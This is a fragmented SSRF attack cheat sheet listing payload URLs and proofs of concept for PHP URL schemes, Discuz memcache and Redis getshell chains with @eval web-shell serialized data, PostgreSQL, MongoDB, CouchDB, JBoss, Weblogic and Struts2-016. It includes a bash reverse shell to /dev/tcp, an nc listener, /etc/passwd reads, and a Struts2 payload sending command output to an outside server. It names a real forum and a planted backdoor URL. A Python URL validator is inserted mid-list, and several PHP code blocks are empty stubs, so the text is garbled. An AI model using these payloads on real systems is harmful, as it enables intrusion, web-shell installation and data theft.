SSRF PHP function
file_get_contents()
URL schema support
SFTP
http://safebuff.com/ssrf.php?url=sftp://evil.com:11111/
Dict
http://safebuff.com/ssrf.php?dict://attacker:11111/
gopher
// http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php
TFTP
http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
file
http://safebuff.com/redirect.php?url=file:///etc/passwd
ldap
http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit
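The scheme list above shows how far a raw URL handed to file_get_contents() can reach: sftp, dict, gopher, tftp, file and ldap all ride on the same call. The following Python check is an added example, not code from the original cheat sheet, showing the server-side validation a defender would put in front of a "fetch remote resource" feature: a scheme and port allowlist, no credentials in the authority, and resolution of the hostname with every returned address tested against loopback, link-local, private and IPv4-mapped ranges, so a DNS name that points back into the intranet is refused as firmly as a literal 127.0.0.1. The blocked-range list, check_url, and the offline table_resolver helper are all assumptions of this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain web fetches are acceptable for a "download remote image" feature;
# sftp://, dict://, gopher://, tftp://, file:// and ldap:// are all refused.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Ranges a server-side fetch must never reach (assumed list for this example;
# extend it to match the deployment's own internal address plan).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8",        # "this" network; 0.0.0.0 reaches localhost on Linux
    "10.0.0.0/8",       # RFC 1918
    "100.64.0.0/10",    # carrier-grade NAT
    "127.0.0.0/8",      # loopback
    "169.254.0.0/16",   # link-local, including cloud metadata services
    "172.16.0.0/12",    # RFC 1918
    "192.168.0.0/16",   # RFC 1918
    "::1/128",          # IPv6 loopback
    "fc00::/7",         # IPv6 unique local
    "fe80::/10",        # IPv6 link-local
    "::ffff:0:0/96",    # IPv4-mapped IPv6, e.g. ::ffff:127.0.0.1
)]


def system_resolver(host):
    """Resolve with the OS resolver; every A/AAAA answer is returned as a string."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def table_resolver(table):
    """Offline resolver built from a constructed {host: [addresses]} table."""
    return lambda host: list(table[host])


def is_blocked(ip):
    """True for any address a user-controlled fetch must not be allowed to hit."""
    return (
        ip.is_loopback or ip.is_link_local or ip.is_multicast
        or ip.is_unspecified or ip.is_reserved
        or any(ip in net for net in BLOCKED_NETWORKS)
    )


def check_url(url, resolver=system_resolver):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (ok, reason, pinned_ip). On success the caller connects to
    pinned_ip (sending the original Host header) instead of resolving again,
    so the DNS answer cannot change between this check and the fetch.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL authority not allowed", None
    host = parts.hostname
    if not host:
        return False, "missing host", None
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port", None
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed", None

    # An IP literal is used as-is; a name is resolved and every answer is
    # checked, because one record pointing inside is enough to pivot.
    try:
        addresses = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addresses = resolver(host)
        except (OSError, KeyError):
            return False, f"host {host!r} does not resolve", None
    if not addresses:
        return False, f"host {host!r} does not resolve", None
    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, f"unparseable address {addr!r}", None
        if is_blocked(ip):
            return False, f"host {host!r} resolves to blocked address {ip}", None
    return True, "ok", addresses[0]


if __name__ == "__main__":
    # Constructed DNS table standing in for the network; no lookups are made.
    resolver = table_resolver({
        "evil.com": ["203.0.113.10"],
        "rebind.example": ["203.0.113.10", "127.0.0.1"],
    })
    for candidate in (
        "sftp://evil.com:11111/",
        "dict://attacker:11111/",
        "file:///etc/passwd",
        "ldap://localhost:11211/%0astats%0aquit",
        "http://rebind.example/",
        "http://evil.com/gopher.php",
    ):
        print(candidate, "->", check_url(candidate, resolver))
```

The check is only as good as what happens after it: the fetch must go to the pinned address and must not follow redirects, otherwise a redirect.php-style hop to file:// or to an internal host, as in the examples above, skips the validation entirely. Hostnames written as decimal or octal integers are not IP literals to ipaddress and are passed to the resolver, which is the correct place to let the OS decide what they mean.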
PHP-FPM
PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit
SSRF memcache Getshell
Generate serialize
<?php
Output
a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} // serialized data
webshell.php
<?php
back.php
<?php
example Discuz
open the website
http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img]
clear data
http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]
backdoor url
http://bbs.biligame.com/data/cache/hello.php
SSRF Redis Getshell
Generate serialize
<?php
Output
a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;} // serialized data
example Discuz
Open website
http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44
Backdoor website
http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes
FFmpeg
cat test.jpg
#EXTM3U
#EXTM3U
PostgreSQL
Exploit
> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211 sslmode=disable','select
MongoDB
Exploit
> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')
CouchDB
exploit
http://localhost:5984/_users/_all_docs
HTTP/1.1 200 OK
An attacker could also send requests from the CouchDB server into the intranet by using the replication function.
POST http://couchdb:5984/_replicate
JBoss
JBoss PoC
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war
Write shell
http://target.com/ueditor/jsp/getRemoteImage.jsp
http://target.com/ueditor/jsp/getRemoteImage.jsp
reverse shell
bash -i >& /dev/tcp/123.45.67.89/9999 0>&1
Weblogic
gopher.php
<?php
vuln website
https://example.com/uddiexplorer/SearchPublicRegistries.jsp
vps
> nc -lvv 2333
Local File Read
http://www.xxx.com/redirect.php?url=file:///etc/passwd
Bool SSRF
Struts2-016 PoC
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}